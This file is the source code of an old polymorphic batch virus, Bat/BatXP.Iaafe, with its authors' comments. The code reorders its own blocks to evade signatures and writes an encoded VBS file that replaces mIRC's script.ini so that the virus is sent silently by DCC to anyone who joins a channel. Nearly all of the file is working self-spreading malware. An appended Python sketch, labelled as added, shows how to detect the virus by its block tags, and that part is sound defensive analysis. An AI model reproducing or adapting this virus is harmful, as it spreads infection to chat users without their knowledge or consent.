Bat.Iaafe.bat
set generation=0
@echo off % spth-phile %
cls % spth-phile %
% spth-phile %set /a generation=%generation%+1
% spth-phile %if %generation% EQU 5 (
% spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe!
% spth-phile %set generation=0
% spth-phile %)
% spth-phile %echo set generation=%generation% >poly.bat
:: Bat/BatXP.Iaafe % spth-phile %
:: by philet0ast3r[rRlf] & Second Part To Hell[rRlf] % spth-phile %
:: % spth-phile %
:: philet0ast3r: Virus idea, name idea and the genial random engine :D % spth-phile %
:: Second Part To Hell: Included the virus part, encrypted the BAT/VBS part, made it workable on BatXP (workable? +fg+), made this stuff polymorphic and wrote the comments % spth-phile %
:: % spth-phile %
:: Big thanks go to Lord Yup for writing the "Silend DCC SEND" article { You'll find it in 29A #6 } % spth-phile %
:: ------------------------------------------------------------------------------------------------------------------------------------------ % spth-phile %
:: General Virus Info: % spth-phile %
:: % spth-phile %
:: Name of the Virus................................. Bat/BatXP.Iaafe % spth-phile %
:: Author............................................ philet0ast3r & Second Part To Hell % spth-phile %
:: Size.............................................. 20.194 byte % spth-phile %
:: Encrypt........................................... Most of the virus part and something of the random-engine % spth-phile %
:: Polymorphism...................................... Yes % spth-phile %
:: (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :] ) % spth-phile %
:: (possible variants under WinME/98/95 (5*4*3*2) =120 ... because command.com doesn't allow more sets) % spth-phile %
:: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but % spth-phile %
:: a much better one. The user won't know that he's infected. % spth-phile %
:: Payload........................................... Every 5th generation the virus shows a short text % spth-phile %
:: % spth-phile %
:: Last words by Second Part To Hell: % spth-phile %
:: I nearly committed suicide while writing this virus ;), % spth-phile %
:: because I had to fix more than 1.000.000 bugs in this fuckin' program. % spth-phile %
:: But I'm sure I fixed all and now the virus works without mistake. % spth-phile %
:: % spth-phile %
:: Last words by philet0ast3r: % spth-phile %
:: I just want to thank/greet some important persons: % spth-phile %
:: breathe for helping me getting the idea how a batch random # generator could work % spth-phile %
:: 3ri5, kathi, ina, janine & phily for being real friends (and more ;) % spth-phile %
:: Slage Hammer % spth-phile %
:: alcopaul % spth-phile %
:: the rest of the rRlf and some other ppl, who know me % spth-phile %
:: % spth-phile %
% spth-phile %set generation=
% spth-phile %set qwxykjsi=set
% spth-phile %set aaa=A
%qwxykjsi% fi=if % spth-phile %
%qwxykjsi% nt=not % spth-phile %
%qwxykjsi% el=errorlevel % spth-phile %
%qwxykjsi% ine=%fi% %nt% %el% % spth-phile %
% spth-phile %set vrsa=rndom
set oto=goto% spth-phile %
%qwxykjsi% a=0 % spth-phile %
set fd=find% spth-phile %
:: This part creates the sets for the encrypted BAT part
%fd% "spth-phile"<%0>>poly.bat
:: The virus searches for "spth-phile" in every line of itself and
:: writes these lines to the poly.bat file
%qwxykjsi% xp=true% spth-phile %
% spth-phile %if %xp% EQU true goto xptruea
:: It's a BatXP command, if it's true, the virus goes to the BatXP part
goto winparta % spth-phile %
:: Else it goes to the Bat part
:xptruea % spth-phile %
% spth-phile %set a=0
% spth-phile %set b=0
% spth-phile %set c=0
% spth-phile %set d=0
% spth-phile %set e=0
% spth-phile %set f=0
% spth-phile %set g=0
% spth-phile %set h=0
% spth-phile %set i=0
% spth-phile %set j=0
% spth-phile %set k=0
% spth-phile %set l=0
% spth-phile %set m=0
% spth-phile %set n=0
% spth-phile %set o=0
% spth-phile %set p=0
% spth-phile %set q=0
% spth-phile %set r=0
% spth-phile %set s=0
% spth-phile %set t=0
% spth-phile %set u=0
:: These sets are for the poly engine, because the variables can't be empty
:: in an if-part
:start0 % spth-phile %
% spth-phile %set aa=0
:: aa, the main poly-engine variable is zero
:start1 % spth-phile %
if %aa% EQU 5 goto endpoly % spth-phile %
%qwxykjsi% /a aa=%aa%+1 % spth-phile %
:: aa is aa+1
:start2 % spth-phile %
ver|time|%fd% ",1">nul % spth-phile %
:: Searching for ",1" in the current time
%ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile %
:: If errorlevel is not set, i.e. the digit searched for in the time is 1,
:: the variable %vrsa%%aa% (rndom + the counter aa, which is 1 at first) is set to 1!
%ine% 1 %oto% start1 % spth-phile %
:: Go to start1
ver|time|%fd% ",2">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
:: Once more the same
ver|time|%fd% ",3">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",4">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",5">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",6">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",7">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",8">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",9">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",0">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
goto start2 % spth-phile %
:endpoly % spth-phile %
% spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 (
% spth-phile %find "%aaa%AAA" <%0 >>poly.bat
% spth-phile %set a=1
% spth-phile %))
:: The last 4 lines are one if-part.
:: If a <> 1 AND %rndom1% (you know: %vrsa%%aa%) is 1, then search for
:: "AAAA" in the whole code and write it to poly.bat. Then change
:: "a" to 1, so this part of the code won't be written to poly.bat once more
% spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 (
% spth-phile %find "%aaa%BBB" <%0 >>poly.bat
% spth-phile %set b=1
% spth-phile %))
:: The same
% spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 (
% spth-phile %find "%aaa%CCC" <%0 >>poly.bat
% spth-phile %set c=1
% spth-phile %))
% spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 (
% spth-phile %find "%aaa%DDD" <%0 >>poly.bat
% spth-phile %set d=1
% spth-phile %))
% spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 (
% spth-phile %find "%aaa%EEE" <%0 >>poly.bat
% spth-phile %set e=1
% spth-phile %))
% spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 (
% spth-phile %find "%aaa%FFF" <%0 >>poly.bat
% spth-phile %set f=1
% spth-phile %))
% spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 (
% spth-phile %find "%aaa%GGG" <%0 >>poly.bat
% spth-phile %set g=1
% spth-phile %))
% spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 (
% spth-phile %find "%aaa%HHH" <%0 >>poly.bat
% spth-phile %set h=1
% spth-phile %))
% spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 (
% spth-phile %find "%aaa%III" <%0 >>poly.bat
% spth-phile %set i=1
% spth-phile %))
% spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 (
% spth-phile %find "%aaa%JJJ" <%0 >>poly.bat
% spth-phile %set j=1
% spth-phile %))
% spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 (
% spth-phile %find "%aaa%KKK" <%0 >>poly.bat
% spth-phile %set k=1
% spth-phile %))
% spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 (
% spth-phile %find "%aaa%LLL" <%0 >>poly.bat
% spth-phile %set l=1
% spth-phile %))
% spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 (
% spth-phile %find "%aaa%MMM" <%0 >>poly.bat
% spth-phile %set m=1
% spth-phile %))
% spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 (
% spth-phile %find "%aaa%NNN" <%0 >>poly.bat
% spth-phile %set n=1
% spth-phile %))
% spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 (
% spth-phile %find "%aaa%OOO" <%0 >>poly.bat
% spth-phile %set o=1
% spth-phile %))
% spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 (
% spth-phile %find "%aaa%PPP" <%0 >>poly.bat
% spth-phile %set p=1
% spth-phile %))
% spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 (
% spth-phile %find "%aaa%QQQ" <%0 >>poly.bat
% spth-phile %set q=1
% spth-phile %))
% spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 (
% spth-phile %find "%aaa%RRR" <%0 >>poly.bat
% spth-phile %set r=1
% spth-phile %))
% spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 (
% spth-phile %find "%aaa%SSS" <%0 >>poly.bat
% spth-phile %set s=1
% spth-phile %))
% spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 (
% spth-phile %find "%aaa%TTT" <%0 >>poly.bat
% spth-phile %set t=1
% spth-phile %))
% spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 (
% spth-phile %find "%aaa%UUU" <%0 >>poly.bat
% spth-phile %set u=1
% spth-phile %))
% spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
% spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
% spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
% spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
% spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
goto irca % spth-phile %
% spth-phile %)))))))))))))))))))))
:: The last 7 lines are one really gigantic if-part :)
:: If every letter from "a" to "u" is 1, then the file goes to the mIRC part.
goto start0 % spth-phile %
:: Else it goes to the start0 part (and searches once more for random numbers)
:winparta % spth-phile %
:: Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof,
:: the virus will start its life here.
set wina=0% spth-phile %
set winb=0% spth-phile %
set winc=0% spth-phile %
set wind=0% spth-phile %
set wine=0% spth-phile %
set oto=% spth-phile %
set qwxykjsi=% spth-phile %
set nt=% spth-phile %
set fi=% spth-phile %
set el=% spth-phile %
set ine=% spth-phile %
:: These are some variables for encryption or for the poly-engine
:startwin2 % spth-phile %
% spth-phile %if not %wina%==1 goto polyengi
% spth-phile %if not %winb%==1 goto polyengi
% spth-phile %if not %winc%==1 goto polyengi
% spth-phile %if not %wind%==1 goto polyengi
% spth-phile %if not %wine%==1 goto polyengi
:: These 5 lines do the same as the big 7-line if-part in the BatXP!
goto winirc % spth-phile %
:polyengi % spth-phile %
ver|time|find ",1">nul % spth-phile %
if not errorlevel 1 set randoma=1% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
:: You already know these lines, because I explained them in the BatXP part
ver|time|find ",2">nul % spth-phile %
if not errorlevel 1 set randoma=2% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",3">nul % spth-phile %
if not errorlevel 1 set randoma=3% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",4">nul % spth-phile %
if not errorlevel 1 set randoma=4% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",5">nul % spth-phile %
if not errorlevel 1 set randoma=5% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
goto startwin2 % spth-phile %
:enpolywin % spth-phile %
% spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin
% spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin
% spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin
% spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin
% spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin
:: If the variable "wina-e" isn't 1, then if the "randoma" is 1-5,
:: the virus goes to another part of the Bat-poly-engine
goto startwin2 % spth-phile %
:enapolywin % spth-phile %
% spth-phile %find "%aaa%BBB"<%0>> poly.bat
% spth-phile %find "%aaa%AAA"<%0>> poly.bat
% spth-phile %find "%aaa%KKK"<%0>> poly.bat
% spth-phile %find "%aaa%DDD"<%0>> poly.bat
set wina=1% spth-phile %
:: The virus writes every line containing "ABBB","AAAA","AKKK","ADDD" to the poly-file
:: and changes the variable "wina" to 1
% spth-phile %goto startwin2
:enbpolywin % spth-phile %
% spth-phile %find "%aaa%EEE"<%0>> poly.bat
% spth-phile %find "%aaa%LLL"<%0>> poly.bat
% spth-phile %find "%aaa%GGG"<%0>> poly.bat
% spth-phile %find "%aaa%HHH"<%0>> poly.bat
set winb=1% spth-phile %
% spth-phile %goto startwin2
:encpolywin % spth-phile %
% spth-phile %find "%aaa%III"<%0>> poly.bat
% spth-phile %find "%aaa%JJJ"<%0>> poly.bat
% spth-phile %find "%aaa%CCC"<%0>> poly.bat
% spth-phile %find "%aaa%FFF"<%0>> poly.bat
set winc=1% spth-phile %
% spth-phile %goto startwin2
:endpolywin % spth-phile %
% spth-phile %find "%aaa%NNN"<%0>> poly.bat
% spth-phile %find "%aaa%MMM"<%0>> poly.bat
% spth-phile %find "%aaa%PPP"<%0>> poly.bat
% spth-phile %find "%aaa%OOO"<%0>> poly.bat
set wind=1% spth-phile %
% spth-phile %goto startwin2
:enepolywin % spth-phile %
% spth-phile %find "%aaa%RRR"<%0>> poly.bat
% spth-phile %find "%aaa%SSS"<%0>> poly.bat
% spth-phile %find "%aaa%UUU"<%0>> poly.bat
% spth-phile %find "%aaa%TTT"<%0>> poly.bat
% spth-phile %find "%aaa%QQQ"<%0>> poly.bat
set wine=1% spth-phile %
% spth-phile %goto startwin2
:winirc % spth-phile %
% spth-phile %set wina=
% spth-phile %set winb=
% spth-phile %set winc=
% spth-phile %set wind=
% spth-phile %set wine=
% spth-phile %set aaa=
% spth-phile %set randoma=
:: All variables used in the poly-engine are deleted
:irca % AAAA %
if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
echo %mir%
if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
goto ircb% AAAA %
:ircb % ABBB %
set mirc=%mir%\script.ini% ABBB %
set vs=chr(% ABBB %
goto ircc% ABBB %
:ircc % ACCC %
set wc=echo file.writeline% ACCC %
goto ircd% ACCC %
:ircd % ADDD %
echo dim fso, file > irc.vbs% ADDD %
echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD %
echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD %
goto irce% ADDD %
:irce % AEEE %
%wc% " on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE %
%wc% " on 1:join:#: { ">>irc.vbs% AEEE %
%wc% " .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE %
goto ircf% AEEE %
:ircf % AFFF %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF %
%wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF %
goto ircg% AFFF %
:ircg % AGGG %
%wc% " } ">>irc.vbs% AGGG %
%wc% " }">>irc.vbs% AGGG %
%wc% " " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG %
goto irch% AGGG %
:irch % AHHH %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) ">>irc.vbs% AHHH %
%wc% " .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH %
goto irci% AHHH %
:irci % AIII %
%wc% " .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) { ">>irc.vbs% AIII %
%wc% " .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII %
goto ircj% AIII %
:ircj % AJJJ %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ %
%wc% " .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip) " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ %
%wc% " .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ %
goto irck% AJJJ %
:irck % AKKK %
%wc% " .timers off">>irc.vbs% AKKK %
%wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK %
%wc% " } ">>irc.vbs% AKKK %
goto ircl% AKKK %
:ircl % ALLL %
%wc% " }">>irc.vbs% ALLL %
%wc% " on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL %
goto ircm% ALLL %
:ircm % AMMM %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM %
%wc% " .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM %
goto ircn% AMMM %
:ircn % ANNN %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN %
%wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN %
goto irco% ANNN %
:irco % AOOO %
%wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO %
%wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO %
goto ircp% AOOO %
:ircp % APPP %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP %
%wc% " }">>irc.vbs% APPP %
%wc% " on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP %
goto ircq % APPP %
:ircq % AQQQ %
%wc% " .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ %
goto ircr% AQQQ %
:ircr % ARRR %
%wc% " .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR %
%wc% " .h" + %vs%97) + "lt">>irc.vbs% ARRR %
%wc% " } .else {">>irc.vbs% ARRR %
goto ircs% ARRR %
:ircs % ASSS %
%wc% " .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS %
%wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS %
goto irct% ASSS %
:irct % ATTT %
%wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT %
%wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT %
%wc% " } } }">>irc.vbs% ATTT %
goto ircu% ATTT %
:ircu % AUUU %
%wc% " " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU %
echo file.Close >>irc.vbs% AUUU %
cscript irc.vbs% AUUU %
cls% AUUU %
goto eirc% AUUU %
:: This is the whole virus part
:: It spreads via mIRC, and is mostly encrypted
:eirc % phile-spth %
del irc.vbs % phile-spth %
find "phile-spth"<%0>>poly.bat
copy poly.bat %mir%\name.bat % phile-spth %
del poly.bat % phile-spth %
cls % phile-spth %
:: Last but not least, the virus searches for "phile-spth" in the virus code
:: and writes it to the poly.bat! Then it copies the poly.bat to the mIRC-dir
:: and deletes the irc.vbs and the poly.bat!
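
Added example (not part of the original file or of the repository): the comments above describe an engine that only reorders tagged blocks, so the tag set itself is an order-invariant signature. The Python sketch below shows a whole-file hash changing between generations while a tag-set check still matches; the regex, the `min_blocks` threshold and the inert sample text are assumptions made for illustration.

```python
import hashlib
import random
import re

# Tags taken from the file above: two framing markers plus the 21 block tags
# AAAA, ABBB ... AUUU, each written as an undefined %...% variable.
TAG_RE = re.compile(r"%\s*(spth-phile|phile-spth|A([A-U])\2{2})\s*%")
BLOCK_TAGS = {"A" + c * 3 for c in "ABCDEFGHIJKLMNOPQRSTU"}


def tag_profile(text):
    """Return the set of marker tags present, ignoring line order."""
    return {m.group(1) for m in TAG_RE.finditer(text)}


def looks_like_iaafe(text, min_blocks=15):
    """Order-invariant verdict: both framing markers plus most block tags.

    min_blocks is an assumed threshold, not a value from the page.
    """
    tags = tag_profile(text)
    framing = {"spth-phile", "phile-spth"} <= tags
    return framing and len(tags & BLOCK_TAGS) >= min_blocks


def reorder_blocks(text, seed):
    """Model a new generation: same lines, tagged blocks in shuffled order."""
    lines = text.splitlines()
    head = [l for l in lines if "spth-phile" in l]
    tail = [l for l in lines if "phile-spth" in l]
    blocks = {}
    for l in lines:
        m = TAG_RE.search(l)
        if m and m.group(1) in BLOCK_TAGS:
            blocks.setdefault(m.group(1), []).append(l)
    order = sorted(blocks)
    random.Random(seed).shuffle(order)
    body = [l for tag in order for l in blocks[tag]]
    return "\n".join(head + body + tail) + "\n"


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


# Constructed, inert sample: comment lines only, carrying the same tags.
SAMPLE = (
    "rem header % spth-phile %\n"
    + "".join(f"rem placeholder % {t} %\n" for t in sorted(BLOCK_TAGS))
    + "rem footer % phile-spth %\n"
)
# Constructed benign batch file that uses ordinary %VAR% expansion.
BENIGN = "@echo off\nset PATH=%PATH%;C:\\tools\necho %USERNAME% % done %\n"

if __name__ == "__main__":
    gen2 = reorder_blocks(SAMPLE, seed=1)
    print("hash changed:", sha256(SAMPLE) != sha256(gen2))
    print("same tag set:", tag_profile(SAMPLE) == tag_profile(gen2))
    print("verdicts:", looks_like_iaafe(SAMPLE), looks_like_iaafe(gen2),
          looks_like_iaafe(BENIGN))
```

The same idea carries over to a YARA rule or an EDR content match: key on the tag strings rather than on a file hash or a fixed byte offset.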